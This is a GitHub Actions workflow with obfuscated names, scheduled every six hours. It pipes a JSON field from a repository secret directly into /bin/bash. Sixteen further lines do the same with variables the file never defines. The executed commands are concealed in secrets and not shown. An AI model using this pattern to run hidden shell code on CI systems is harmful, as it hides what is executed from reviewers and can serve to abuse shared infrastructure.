name: linzebei1938
on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: linzebei1938
        env:
          skd445: ${{ secrets.skd445 }}
        run: |
          echo $skd445 | jq -r .zo81 | /bin/bash
          echo $ms72739 | jq -r .dpecc8024 | /bin/bash
          echo $d481 | jq -r .phy0985 | /bin/bash
          echo $ypk59 | jq -r .ddh84604 | /bin/bash
          echo $kgpm1406 | jq -r .rjybn9277 | /bin/bash
          echo $c531 | jq -r .jwth1174 | /bin/bash
          echo $gnrq023 | jq -r .ufwft698 | /bin/bash
          echo $x924 | jq -r .pi56125 | /bin/bash
          echo $pd605 | jq -r .lk8186 | /bin/bash
          echo $cpc42052 | jq -r .zwrnr93 | /bin/bash
          echo $flgr91902 | jq -r .fc97 | /bin/bash
          echo $kjmma12826 | jq -r .vmhu3 | /bin/bash
          echo $o605 | jq -r .vkn55579 | /bin/bash
          echo $rwdr51521 | jq -r .gaz9798 | /bin/bash
          echo $jq66442 | jq -r .zqfo0022 | /bin/bash
          echo $kb340 | jq -r .h1176 | /bin/bash
          echo $pnb67 | jq -r .yusy75 | /bin/bash

